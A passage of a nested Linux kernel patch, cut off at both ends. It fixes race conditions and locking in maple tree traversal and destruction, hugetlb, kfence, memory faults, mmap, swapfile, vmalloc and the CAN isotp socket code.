++		node->node_count = 0;
++		node->request_count = 0;
+ 		requested -= count;
+ 	}
+-	mas->alloc->total = success;
++	mas->alloc->total = allocated;
+ 	return;
+ 
+ nomem_bulk:
+@@ -1276,7 +1329,7 @@ nomem_bulk:
+ nomem_one:
+ 	mas_set_alloc_req(mas, requested);
+ 	if (mas->alloc && !(((unsigned long)mas->alloc & 0x1)))
+-		mas->alloc->total = success;
++		mas->alloc->total = allocated;
+ 	mas_set_err(mas, -ENOMEM);
+ 	return;
+ 
+@@ -1334,7 +1387,7 @@ static void mas_node_count(struct ma_state *mas, int count)
+  * mas_start() - Sets up maple state for operations.
+  * @mas: The maple state.
+  *
+- * If mas->node == MAS_START, then set the min, max, depth, and offset to
++ * If mas->node == MAS_START, then set the min, max and depth to
+  * defaults.
+  *
+  * Return:
+@@ -1348,22 +1401,26 @@ static inline struct maple_enode *mas_start(struct ma_state *mas)
+ 	if (likely(mas_is_start(mas))) {
+ 		struct maple_enode *root;
+ 
+-		mas->node = MAS_NONE;
+ 		mas->min = 0;
+ 		mas->max = ULONG_MAX;
+ 		mas->depth = 0;
+-		mas->offset = 0;
+ 
++retry:
+ 		root = mas_root(mas);
+ 		/* Tree with nodes */
+ 		if (likely(xa_is_node(root))) {
+ 			mas->depth = 1;
+ 			mas->node = mte_safe_root(root);
++			mas->offset = 0;
++			if (mte_dead_node(mas->node))
++				goto retry;
++
+ 			return NULL;
+ 		}
+ 
+ 		/* empty tree */
+ 		if (unlikely(!root)) {
++			mas->node = MAS_NONE;
+ 			mas->offset = MAPLE_NODE_SLOTS;
+ 			return NULL;
+ 		}
+@@ -1399,6 +1456,9 @@ static inline unsigned char ma_data_end(struct maple_node *node,
+ {
+ 	unsigned char offset;
+ 
++	if (!pivots)
++		return 0;
++
+ 	if (type == maple_arange_64)
+ 		return ma_meta_end(node, type);
+ 
+@@ -1434,6 +1494,9 @@ static inline unsigned char mas_data_end(struct ma_state *mas)
+ 		return ma_meta_end(node, type);
+ 
+ 	pivots = ma_pivots(node, type);
++	if (unlikely(ma_dead_node(node)))
++		return 0;
++
+ 	offset = mt_pivots[type] - 1;
+ 	if (likely(!pivots[offset]))
+ 		return ma_meta_end(node, type);
+@@ -3659,10 +3722,9 @@ static inline int mas_root_expand(struct ma_state *mas, void *entry)
+ 		slot++;
+ 	mas->depth = 1;
+ 	mas_set_height(mas);
+-
++	ma_set_meta(node, maple_leaf_64, 0, slot);
+ 	/* swap the new root into the tree */
+ 	rcu_assign_pointer(mas->tree->ma_root, mte_mk_root(mas->node));
+-	ma_set_meta(node, maple_leaf_64, 0, slot);
+ 	return slot;
+ }
+ 
+@@ -3875,18 +3937,13 @@ static inline void *mtree_lookup_walk(struct ma_state *mas)
+ 		end = ma_data_end(node, type, pivots, max);
+ 		if (unlikely(ma_dead_node(node)))
+ 			goto dead_node;
+-
+-		if (pivots[offset] >= mas->index)
+-			goto next;
+-
+ 		do {
+-			offset++;
+-		} while ((offset < end) && (pivots[offset] < mas->index));
+-
+-		if (likely(offset > end))
+-			max = pivots[offset];
++			if (pivots[offset] >= mas->index) {
++				max = pivots[offset];
++				break;
++			}
++		} while (++offset < end);
+ 
+-next:
+ 		slots = ma_slots(node, type);
+ 		next = mt_slot(mas->tree, slots, offset);
+ 		if (unlikely(ma_dead_node(node)))
+@@ -4505,6 +4562,9 @@ static inline int mas_prev_node(struct ma_state *mas, unsigned long min)
+ 	node = mas_mn(mas);
+ 	slots = ma_slots(node, mt);
+ 	pivots = ma_pivots(node, mt);
++	if (unlikely(ma_dead_node(node)))
++		return 1;
++
+ 	mas->max = pivots[offset];
+ 	if (offset)
+ 		mas->min = pivots[offset - 1] + 1;
+@@ -4526,6 +4586,9 @@ static inline int mas_prev_node(struct ma_state *mas, unsigned long min)
+ 		slots = ma_slots(node, mt);
+ 		pivots = ma_pivots(node, mt);
+ 		offset = ma_data_end(node, mt, pivots, mas->max);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
+ 		if (offset)
+ 			mas->min = pivots[offset - 1] + 1;
+ 
+@@ -4574,6 +4637,7 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 	struct maple_enode *enode;
+ 	int level = 0;
+ 	unsigned char offset;
++	unsigned char node_end;
+ 	enum maple_type mt;
+ 	void __rcu **slots;
+ 
+@@ -4597,7 +4661,11 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 		node = mas_mn(mas);
+ 		mt = mte_node_type(mas->node);
+ 		pivots = ma_pivots(node, mt);
+-	} while (unlikely(offset == ma_data_end(node, mt, pivots, mas->max)));
++		node_end = ma_data_end(node, mt, pivots, mas->max);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
++	} while (unlikely(offset == node_end));
+ 
+ 	slots = ma_slots(node, mt);
+ 	pivot = mas_safe_pivot(mas, pivots, ++offset, mt);
+@@ -4613,6 +4681,9 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 		mt = mte_node_type(mas->node);
+ 		slots = ma_slots(node, mt);
+ 		pivots = ma_pivots(node, mt);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
+ 		offset = 0;
+ 		pivot = pivots[0];
+ 	}
+@@ -4659,16 +4730,19 @@ static inline void *mas_next_nentry(struct ma_state *mas,
+ 		return NULL;
+ 	}
+ 
+-	pivots = ma_pivots(node, type);
+ 	slots = ma_slots(node, type);
++	pivots = ma_pivots(node, type);
++	count = ma_data_end(node, type, pivots, mas->max);
++	if (unlikely(ma_dead_node(node)))
++		return NULL;
++
+ 	mas->index = mas_safe_min(mas, pivots, mas->offset);
+-	if (ma_dead_node(node))
++	if (unlikely(ma_dead_node(node)))
+ 		return NULL;
+ 
+ 	if (mas->index > max)
+ 		return NULL;
+ 
+-	count = ma_data_end(node, type, pivots, mas->max);
+ 	if (mas->offset > count)
+ 		return NULL;
+ 
+@@ -4743,6 +4817,11 @@ static inline void *mas_next_entry(struct ma_state *mas, unsigned long limit)
+ 	unsigned long last;
+ 	enum maple_type mt;
+ 
++	if (mas->index > limit) {
++		mas->index = mas->last = limit;
++		mas_pause(mas);
++		return NULL;
++	}
+ 	last = mas->last;
+ retry:
+ 	offset = mas->offset;
+@@ -4816,6 +4895,11 @@ retry:
+ 
+ 	slots = ma_slots(mn, mt);
+ 	pivots = ma_pivots(mn, mt);
++	if (unlikely(ma_dead_node(mn))) {
++		mas_rewalk(mas, index);
++		goto retry;
++	}
++
+ 	if (offset == mt_pivots[mt])
+ 		pivot = mas->max;
+ 	else
+@@ -4849,6 +4933,11 @@ static inline void *mas_prev_entry(struct ma_state *mas, unsigned long min)
+ {
+ 	void *entry;
+ 
++	if (mas->index < min) {
++		mas->index = mas->last = min;
++		mas->node = MAS_NONE;
++		return NULL;
++	}
+ retry:
+ 	while (likely(!mas_is_none(mas))) {
+ 		entry = mas_prev_nentry(mas, min, mas->index);
+@@ -5394,24 +5483,26 @@ no_gap:
+ }
+ 
+ /*
+- * mas_dead_leaves() - Mark all leaves of a node as dead.
++ * mte_dead_leaves() - Mark all leaves of a node as dead.
+  * @mas: The maple state
+  * @slots: Pointer to the slot array
++ * @type: The maple node type
+  *
+  * Must hold the write lock.
+  *
+  * Return: The number of leaves marked as dead.
+  */
+ static inline
+-unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
++unsigned char mte_dead_leaves(struct maple_enode *enode, struct maple_tree *mt,
++			      void __rcu **slots)
+ {
+ 	struct maple_node *node;
+ 	enum maple_type type;
+ 	void *entry;
+ 	int offset;
+ 
+-	for (offset = 0; offset < mt_slot_count(mas->node); offset++) {
+-		entry = mas_slot_locked(mas, slots, offset);
++	for (offset = 0; offset < mt_slot_count(enode); offset++) {
++		entry = mt_slot(mt, slots, offset);
+ 		type = mte_node_type(entry);
+ 		node = mte_to_node(entry);
+ 		/* Use both node and type to catch LE & BE metadata */
+@@ -5419,7 +5510,6 @@ unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
+ 			break;
+ 
+ 		mte_set_node_dead(entry);
+-		smp_wmb(); /* Needed for RCU */
+ 		node->type = type;
+ 		rcu_assign_pointer(slots[offset], node);
+ 	}
+@@ -5427,151 +5517,160 @@ unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
+ 	return offset;
+ }
+ 
+-static void __rcu **mas_dead_walk(struct ma_state *mas, unsigned char offset)
++/**
++ * mte_dead_walk() - Walk down a dead tree to just before the leaves
++ * @enode: The maple encoded node
++ * @offset: The starting offset
++ *
++ * Note: This can only be used from the RCU callback context.
++ */
++static void __rcu **mte_dead_walk(struct maple_enode **enode, unsigned char offset)
+ {
+ 	struct maple_node *node, *next;
+ 	void __rcu **slots = NULL;
+ 
+-	next = mas_mn(mas);
++	next = mte_to_node(*enode);
+ 	do {
+-		mas->node = ma_enode_ptr(next);
+-		node = mas_mn(mas);
++		*enode = ma_enode_ptr(next);
++		node = mte_to_node(*enode);
+ 		slots = ma_slots(node, node->type);
+-		next = mas_slot_locked(mas, slots, offset);
++		next = rcu_dereference_protected(slots[offset],
++					lock_is_held(&rcu_callback_map));
+ 		offset = 0;
+ 	} while (!ma_is_leaf(next->type));
+ 
+ 	return slots;
+ }
+ 
++/**
++ * mt_free_walk() - Walk & free a tree in the RCU callback context
++ * @head: The RCU head that's within the node.
++ *
++ * Note: This can only be used from the RCU callback context.
++ */
+ static void mt_free_walk(struct rcu_head *head)
+ {
+ 	void __rcu **slots;
+ 	struct maple_node *node, *start;
+-	struct maple_tree mt;
++	struct maple_enode *enode;
+ 	unsigned char offset;
+ 	enum maple_type type;
+-	MA_STATE(mas, &mt, 0, 0);
+ 
+ 	node = container_of(head, struct maple_node, rcu);
+ 
+ 	if (ma_is_leaf(node->type))
+ 		goto free_leaf;
+ 
+-	mt_init_flags(&mt, node->ma_flags);
+-	mas_lock(&mas);
+ 	start = node;
+-	mas.node = mt_mk_node(node, node->type);
+-	slots = mas_dead_walk(&mas, 0);
+-	node = mas_mn(&mas);
++	enode = mt_mk_node(node, node->type);
++	slots = mte_dead_walk(&enode, 0);
++	node = mte_to_node(enode);
+ 	do {
+ 		mt_free_bulk(node->slot_len, slots);
+ 		offset = node->parent_slot + 1;
+-		mas.node = node->piv_parent;
+-		if (mas_mn(&mas) == node)
+-			goto start_slots_free;
+-
+-		type = mte_node_type(mas.node);
+-		slots = ma_slots(mte_to_node(mas.node), type);
+-		if ((offset < mt_slots[type]) && (slots[offset]))
+-			slots = mas_dead_walk(&mas, offset);
+-
+-		node = mas_mn(&mas);
++		enode = node->piv_parent;
++		if (mte_to_node(enode) == node)
++			goto free_leaf;
++
++		type = mte_node_type(enode);
++		slots = ma_slots(mte_to_node(enode), type);
++		if ((offset < mt_slots[type]) &&
++		    rcu_dereference_protected(slots[offset],
++					      lock_is_held(&rcu_callback_map)))
++			slots = mte_dead_walk(&enode, offset);
++		node = mte_to_node(enode);
+ 	} while ((node != start) || (node->slot_len < offset));
+ 
+ 	slots = ma_slots(node, node->type);
+ 	mt_free_bulk(node->slot_len, slots);
+ 
+-start_slots_free:
+-	mas_unlock(&mas);
+ free_leaf:
+ 	mt_free_rcu(&node->rcu);
+ }
+ 
+-static inline void __rcu **mas_destroy_descend(struct ma_state *mas,
+-			struct maple_enode *prev, unsigned char offset)
++static inline void __rcu **mte_destroy_descend(struct maple_enode **enode,
++	struct maple_tree *mt, struct maple_enode *prev, unsigned char offset)
+ {
+ 	struct maple_node *node;
+-	struct maple_enode *next = mas->node;
++	struct maple_enode *next = *enode;
+ 	void __rcu **slots = NULL;
++	enum maple_type type;
++	unsigned char next_offset = 0;
+ 
+ 	do {
+-		mas->node = next;
+-		node = mas_mn(mas);
+-		slots = ma_slots(node, mte_node_type(mas->node));
+-		next = mas_slot_locked(mas, slots, 0);
++		*enode = next;
++		node = mte_to_node(*enode);
++		type = mte_node_type(*enode);
++		slots = ma_slots(node, type);
++		next = mt_slot_locked(mt, slots, next_offset);
+ 		if ((mte_dead_node(next)))
+-			next = mas_slot_locked(mas, slots, 1);
++			next = mt_slot_locked(mt, slots, ++next_offset);
+ 
+-		mte_set_node_dead(mas->node);
+-		node->type = mte_node_type(mas->node);
++		mte_set_node_dead(*enode);
++		node->type = type;
+ 		node->piv_parent = prev;
+ 		node->parent_slot = offset;
+-		offset = 0;
+-		prev = mas->node;
++		offset = next_offset;
++		next_offset = 0;
++		prev = *enode;
+ 	} while (!mte_is_leaf(next));
+ 
+ 	return slots;
+ }
+ 
+-static void mt_destroy_walk(struct maple_enode *enode, unsigned char ma_flags,
++static void mt_destroy_walk(struct maple_enode *enode, struct maple_tree *mt,
+ 			    bool free)
+ {
+ 	void __rcu **slots;
+ 	struct maple_node *node = mte_to_node(enode);
+ 	struct maple_enode *start;
+-	struct maple_tree mt;
+-
+-	MA_STATE(mas, &mt, 0, 0);
+ 
+-	if (mte_is_leaf(enode))
++	if (mte_is_leaf(enode)) {
++		node->type = mte_node_type(enode);
+ 		goto free_leaf;
++	}
+ 
+-	mt_init_flags(&mt, ma_flags);
+-	mas_lock(&mas);
+-
+-	mas.node = start = enode;
+-	slots = mas_destroy_descend(&mas, start, 0);
+-	node = mas_mn(&mas);
++	start = enode;
++	slots = mte_destroy_descend(&enode, mt, start, 0);
++	node = mte_to_node(enode); // Updated in the above call.
+ 	do {
+ 		enum maple_type type;
+ 		unsigned char offset;
+ 		struct maple_enode *parent, *tmp;
+ 
+-		node->slot_len = mas_dead_leaves(&mas, slots);
++		node->slot_len = mte_dead_leaves(enode, mt, slots);
+ 		if (free)
+ 			mt_free_bulk(node->slot_len, slots);
+ 		offset = node->parent_slot + 1;
+-		mas.node = node->piv_parent;
+-		if (mas_mn(&mas) == node)
+-			goto start_slots_free;
++		enode = node->piv_parent;
++		if (mte_to_node(enode) == node)
++			goto free_leaf;
+ 
+-		type = mte_node_type(mas.node);
+-		slots = ma_slots(mte_to_node(mas.node), type);
++		type = mte_node_type(enode);
++		slots = ma_slots(mte_to_node(enode), type);
+ 		if (offset >= mt_slots[type])
+ 			goto next;
+ 
+-		tmp = mas_slot_locked(&mas, slots, offset);
++		tmp = mt_slot_locked(mt, slots, offset);
+ 		if (mte_node_type(tmp) && mte_to_node(tmp)) {
+-			parent = mas.node;
+-			mas.node = tmp;
+-			slots = mas_destroy_descend(&mas, parent, offset);
++			parent = enode;
++			enode = tmp;
++			slots = mte_destroy_descend(&enode, mt, parent, offset);
+ 		}
+ next:
+-		node = mas_mn(&mas);
+-	} while (start != mas.node);
++		node = mte_to_node(enode);
++	} while (start != enode);
+ 
+-	node = mas_mn(&mas);
+-	node->slot_len = mas_dead_leaves(&mas, slots);
++	node = mte_to_node(enode);
++	node->slot_len = mte_dead_leaves(enode, mt, slots);
+ 	if (free)
+ 		mt_free_bulk(node->slot_len, slots);
+ 
+-start_slots_free:
+-	mas_unlock(&mas);
+-
+ free_leaf:
+ 	if (free)
+ 		mt_free_rcu(&node->rcu);
++	else
++		mt_clear_meta(mt, node, node->type);
+ }
+ 
+ /*
+@@ -5587,15 +5686,18 @@ static inline void mte_destroy_walk(struct maple_enode *enode,
+ 	struct maple_node *node = mte_to_node(enode);
+ 
+ 	if (mt_in_rcu(mt)) {
+-		mt_destroy_walk(enode, mt->ma_flags, false);
++		mt_destroy_walk(enode, mt, false);
+ 		call_rcu(&node->rcu, mt_free_walk);
+ 	} else {
+-		mt_destroy_walk(enode, mt->ma_flags, true);
++		mt_destroy_walk(enode, mt, true);
+ 	}
+ }
+ 
+ static void mas_wr_store_setup(struct ma_wr_state *wr_mas)
+ {
++	if (unlikely(mas_is_paused(wr_mas->mas)))
++		mas_reset(wr_mas->mas);
++
+ 	if (!mas_is_start(wr_mas->mas)) {
+ 		if (mas_is_none(wr_mas->mas)) {
+ 			mas_reset(wr_mas->mas);
+@@ -5731,6 +5833,7 @@ int mas_preallocate(struct ma_state *mas, void *entry, gfp_t gfp)
+ void mas_destroy(struct ma_state *mas)
+ {
+ 	struct maple_alloc *node;
++	unsigned long total;
+ 
+ 	/*
+ 	 * When using mas_for_each() to insert an expected number of elements,
+@@ -5753,14 +5856,20 @@ void mas_destroy(struct ma_state *mas)
+ 	}
+ 	mas->mas_flags &= ~(MA_STATE_BULK|MA_STATE_PREALLOC);
+ 
+-	while (mas->alloc && !((unsigned long)mas->alloc & 0x1)) {
++	total = mas_allocated(mas);
++	while (total) {
+ 		node = mas->alloc;
+ 		mas->alloc = node->slot[0];
+-		if (node->node_count > 0)
+-			mt_free_bulk(node->node_count,
+-				     (void __rcu **)&node->slot[1]);
++		if (node->node_count > 1) {
++			size_t count = node->node_count - 1;
++
++			mt_free_bulk(count, (void __rcu **)&node->slot[1]);
++			total -= count;
++		}
+ 		kmem_cache_free(maple_node_cache, node);
++		total--;
+ 	}
++
+ 	mas->alloc = NULL;
+ }
+ EXPORT_SYMBOL_GPL(mas_destroy);
+@@ -5898,6 +6007,7 @@ void *mas_prev(struct ma_state *mas, unsigned long min)
+ 	if (!mas->index) {
+ 		/* Nothing comes before 0 */
+ 		mas->last = 0;
++		mas->node = MAS_NONE;
+ 		return NULL;
+ 	}
+ 
+@@ -5988,6 +6098,9 @@ void *mas_find(struct ma_state *mas, unsigned long max)
+ 		mas->index = ++mas->last;
+ 	}
+ 
++	if (unlikely(mas_is_none(mas)))
++		mas->node = MAS_START;
++
+ 	if (unlikely(mas_is_start(mas))) {
+ 		/* First run or continue */
+ 		void *entry;
+@@ -6599,11 +6712,11 @@ static inline void *mas_first_entry(struct ma_state *mas, struct maple_node *mn,
+ 	while (likely(!ma_is_leaf(mt))) {
+ 		MT_BUG_ON(mas->tree, mte_dead_node(mas->node));
+ 		slots = ma_slots(mn, mt);
+-		pivots = ma_pivots(mn, mt);
+-		max = pivots[0];
+ 		entry = mas_slot(mas, slots, 0);
++		pivots = ma_pivots(mn, mt);
+ 		if (unlikely(ma_dead_node(mn)))
+ 			return NULL;
++		max = pivots[0];
+ 		mas->node = entry;
+ 		mn = mas_mn(mas);
+ 		mt = mte_node_type(mas->node);
+@@ -6623,13 +6736,13 @@ static inline void *mas_first_entry(struct ma_state *mas, struct maple_node *mn,
+ 	if (likely(entry))
+ 		return entry;
+ 
+-	pivots = ma_pivots(mn, mt);
+-	mas->index = pivots[0] + 1;
+ 	mas->offset = 1;
+ 	entry = mas_slot(mas, slots, 1);
++	pivots = ma_pivots(mn, mt);
+ 	if (unlikely(ma_dead_node(mn)))
+ 		return NULL;
+ 
++	mas->index = pivots[0] + 1;
+ 	if (mas->index > limit)
+ 		goto none;
+ 
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index bdbfeb6fb3934..4d338f70155cf 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -5476,7 +5476,7 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		       struct page *pagecache_page, spinlock_t *ptl)
+ {
+ 	const bool unshare = flags & FAULT_FLAG_UNSHARE;
+-	pte_t pte;
++	pte_t pte = huge_ptep_get(ptep);
+ 	struct hstate *h = hstate_vma(vma);
+ 	struct page *old_page, *new_page;
+ 	int outside_reserve = 0;
+@@ -5484,6 +5484,17 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	unsigned long haddr = address & huge_page_mask(h);
+ 	struct mmu_notifier_range range;
+ 
++	/*
++	 * Never handle CoW for uffd-wp protected pages.  It should be only
++	 * handled when the uffd-wp protection is removed.
++	 *
++	 * Note that only the CoW optimization path (in hugetlb_no_page())
++	 * can trigger this, because hugetlb_fault() will always resolve
++	 * uffd-wp bit first.
++	 */
++	if (!unshare && huge_pte_uffd_wp(pte))
++		return 0;
++
+ 	/*
+ 	 * hugetlb does not support FOLL_FORCE-style write faults that keep the
+ 	 * PTE mapped R/O such as maybe_mkwrite() would do.
+@@ -5497,7 +5508,6 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		return 0;
+ 	}
+ 
+-	pte = huge_ptep_get(ptep);
+ 	old_page = pte_page(pte);
+ 
+ 	delayacct_wpcopy_start();
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index 79c94ee55f97b..1065e0568d05a 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -556,15 +556,11 @@ static unsigned long kfence_init_pool(void)
+ 	 * enters __slab_free() slow-path.
+ 	 */
+ 	for (i = 0; i < KFENCE_POOL_SIZE / PAGE_SIZE; i++) {
+-		struct slab *slab = page_slab(&pages[i]);
++		struct slab *slab = page_slab(nth_page(pages, i));
+ 
+ 		if (!i || (i % 2))
+ 			continue;
+ 
+-		/* Verify we do not have a compound head page. */
+-		if (WARN_ON(compound_head(&pages[i]) != &pages[i]))
+-			return addr;
+-
+ 		__folio_set_slab(slab_folio(slab));
+ #ifdef CONFIG_MEMCG
+ 		slab->memcg_data = (unsigned long)&kfence_metadata[i / 2 - 1].objcg |
+@@ -597,12 +593,26 @@ static unsigned long kfence_init_pool(void)
+ 
+ 		/* Protect the right redzone. */
+ 		if (unlikely(!kfence_protect(addr + PAGE_SIZE)))
+-			return addr;
++			goto reset_slab;
+ 
+ 		addr += 2 * PAGE_SIZE;
+ 	}
+ 
+ 	return 0;
++
++reset_slab:
++	for (i = 0; i < KFENCE_POOL_SIZE / PAGE_SIZE; i++) {
++		struct slab *slab = page_slab(nth_page(pages, i));
++
++		if (!i || (i % 2))
++			continue;
++#ifdef CONFIG_MEMCG
++		slab->memcg_data = 0;
++#endif
++		__folio_clear_slab(slab_folio(slab));
++	}
++
++	return addr;
+ }
+ 
+ static bool __init kfence_init_pool_early(void)
+@@ -632,16 +642,6 @@ static bool __init kfence_init_pool_early(void)
+ 	 * fails for the first page, and therefore expect addr==__kfence_pool in
+ 	 * most failure cases.
+ 	 */
+-	for (char *p = (char *)addr; p < __kfence_pool + KFENCE_POOL_SIZE; p += PAGE_SIZE) {
+-		struct slab *slab = virt_to_slab(p);
+-
+-		if (!slab)
+-			continue;
+-#ifdef CONFIG_MEMCG
+-		slab->memcg_data = 0;
+-#endif
+-		__folio_clear_slab(slab_folio(slab));
+-	}
+ 	memblock_free_late(__pa(addr), KFENCE_POOL_SIZE - (addr - (unsigned long)__kfence_pool));
+ 	__kfence_pool = NULL;
+ 	return false;
+diff --git a/mm/memory.c b/mm/memory.c
+index f526b9152bef2..6a99e9dc07e6e 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3580,8 +3580,21 @@ static vm_fault_t remove_device_exclusive_entry(struct vm_fault *vmf)
+ 	struct vm_area_struct *vma = vmf->vma;
+ 	struct mmu_notifier_range range;
+ 
+-	if (!folio_lock_or_retry(folio, vma->vm_mm, vmf->flags))
++	/*
++	 * We need a reference to lock the folio because we don't hold
++	 * the PTL so a racing thread can remove the device-exclusive
++	 * entry and unmap it. If the folio is free the entry must
++	 * have been removed already. If it happens to have already
++	 * been re-allocated after being freed all we do is lock and
++	 * unlock it.
++	 */
++	if (!folio_try_get(folio))
++		return 0;
++
++	if (!folio_lock_or_retry(folio, vma->vm_mm, vmf->flags)) {
++		folio_put(folio);
+ 		return VM_FAULT_RETRY;
++	}
+ 	mmu_notifier_range_init_owner(&range, MMU_NOTIFY_EXCLUSIVE, 0, vma,
+ 				vma->vm_mm, vmf->address & PAGE_MASK,
+ 				(vmf->address & PAGE_MASK) + PAGE_SIZE, NULL);
+@@ -3594,6 +3607,7 @@ static vm_fault_t remove_device_exclusive_entry(struct vm_fault *vmf)
+ 
+ 	pte_unmap_unlock(vmf->pte, vmf->ptl);
+ 	folio_unlock(folio);
++	folio_put(folio);
+ 
+ 	mmu_notifier_invalidate_range_end(&range);
+ 	return 0;
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 425a9349e6108..1931da077b2f9 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -2308,7 +2308,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 	int count = 0;
+ 	int error = -ENOMEM;
+ 	MA_STATE(mas_detach, &mt_detach, 0, 0);
+-	mt_init_flags(&mt_detach, MT_FLAGS_LOCK_EXTERN);
++	mt_init_flags(&mt_detach, mas->tree->ma_flags & MT_FLAGS_LOCK_MASK);
+ 	mt_set_external_lock(&mt_detach, &mm->mmap_lock);
+ 
+ 	if (mas_preallocate(mas, vma, GFP_KERNEL))
+@@ -3095,6 +3095,7 @@ void exit_mmap(struct mm_struct *mm)
+ 	 */
+ 	set_bit(MMF_OOM_SKIP, &mm->flags);
+ 	mmap_write_lock(mm);
++	mt_clear_in_rcu(&mm->mm_mt);
+ 	free_pgtables(&tlb, &mm->mm_mt, vma, FIRST_USER_ADDRESS,
+ 		      USER_PGTABLES_CEILING);
+ 	tlb_finish_mmu(&tlb);
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index eb9b0bf1fcddb..36899c4253019 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -679,6 +679,7 @@ static void __del_from_avail_list(struct swap_info_struct *p)
+ {
+ 	int nid;
+ 
++	assert_spin_locked(&p->lock);
+ 	for_each_node(nid)
+ 		plist_del(&p->avail_lists[nid], &swap_avail_heads[nid]);
+ }
+@@ -2435,8 +2436,8 @@ SYSCALL_DEFINE1(swapoff, const char __user *, specialfile)
+ 		spin_unlock(&swap_lock);
+ 		goto out_dput;
+ 	}
+-	del_from_avail_list(p);
+ 	spin_lock(&p->lock);
++	del_from_avail_list(p);
+ 	if (p->prio < 0) {
+ 		struct swap_info_struct *si = p;
+ 		int nid;
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index ca71de7c9d775..b2249d01b3a2c 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -3070,9 +3070,11 @@ static void *__vmalloc_area_node(struct vm_struct *area, gfp_t gfp_mask,
+ 	 * allocation request, free them via __vfree() if any.
+ 	 */
+ 	if (area->nr_pages != nr_small_pages) {
+-		warn_alloc(gfp_mask, NULL,
+-			"vmalloc error: size %lu, page order %u, failed to allocate pages",
+-			area->nr_pages * PAGE_SIZE, page_order);
++		/* vm_area_alloc_pages() can also fail due to a fatal signal */
++		if (!fatal_signal_pending(current))
++			warn_alloc(gfp_mask, NULL,
++				"vmalloc error: size %lu, page order %u, failed to allocate pages",
++				area->nr_pages * PAGE_SIZE, page_order);
+ 		goto fail;
+ 	}
+ 
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 9bc344851704e..5761d4ab839dd 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -119,7 +119,8 @@ enum {
+ 	ISOTP_WAIT_FIRST_FC,
+ 	ISOTP_WAIT_FC,
+ 	ISOTP_WAIT_DATA,
+-	ISOTP_SENDING
++	ISOTP_SENDING,
++	ISOTP_SHUTDOWN,
+ };
+ 
+ struct tpcon {
+@@ -880,8 +881,8 @@ static enum hrtimer_restart isotp_tx_timer_handler(struct hrtimer *hrtimer)
+ 					     txtimer);
+ 	struct sock *sk = &so->sk;
+ 
+-	/* don't handle timeouts in IDLE state */
+-	if (so->tx.state == ISOTP_IDLE)
++	/* don't handle timeouts in IDLE or SHUTDOWN state */
++	if (so->tx.state == ISOTP_IDLE || so->tx.state == ISOTP_SHUTDOWN)
+ 		return HRTIMER_NORESTART;
+ 
+ 	/* we did not get any flow control or echo frame in time */
+@@ -918,7 +919,6 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct isotp_sock *so = isotp_sk(sk);
+-	u32 old_state = so->tx.state;
+ 	struct sk_buff *skb;
+ 	struct net_device *dev;
+ 	struct canfd_frame *cf;
+@@ -928,23 +928,24 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 	int off;
+ 	int err;
+ 
+-	if (!so->bound)
++	if (!so->bound || so->tx.state == ISOTP_SHUTDOWN)
+ 		return -EADDRNOTAVAIL;
+ 
++wait_free_buffer:
+ 	/* we do not support multiple buffers - for now */
+-	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE ||
+-	    wq_has_sleeper(&so->wait)) {
+-		if (msg->msg_flags & MSG_DONTWAIT) {
+-			err = -EAGAIN;
+-			goto err_out;
+-		}
++	if (wq_has_sleeper(&so->wait) && (msg->msg_flags & MSG_DONTWAIT))
++		return -EAGAIN;
+ 
+-		/* wait for complete transmission of current pdu */
+-		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
+-		if (err)
+-			goto err_out;
++	/* wait for complete transmission of current pdu */
++	err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++	if (err)
++		goto err_event_drop;
+ 
+-		so->tx.state = ISOTP_SENDING;
++	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE) {
++		if (so->tx.state == ISOTP_SHUTDOWN)
++			return -EADDRNOTAVAIL;
++
++		goto wait_free_buffer;
+ 	}
+ 
+ 	if (!size || size > MAX_MSG_LENGTH) {
+@@ -1074,7 +1075,9 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	if (wait_tx_done) {
+ 		/* wait for complete transmission of current pdu */
+-		wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		if (err)
++			goto err_event_drop;
+ 
+ 		if (sk->sk_err)
+ 			return -sk->sk_err;
+@@ -1082,13 +1085,15 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	return size;
+ 
++err_event_drop:
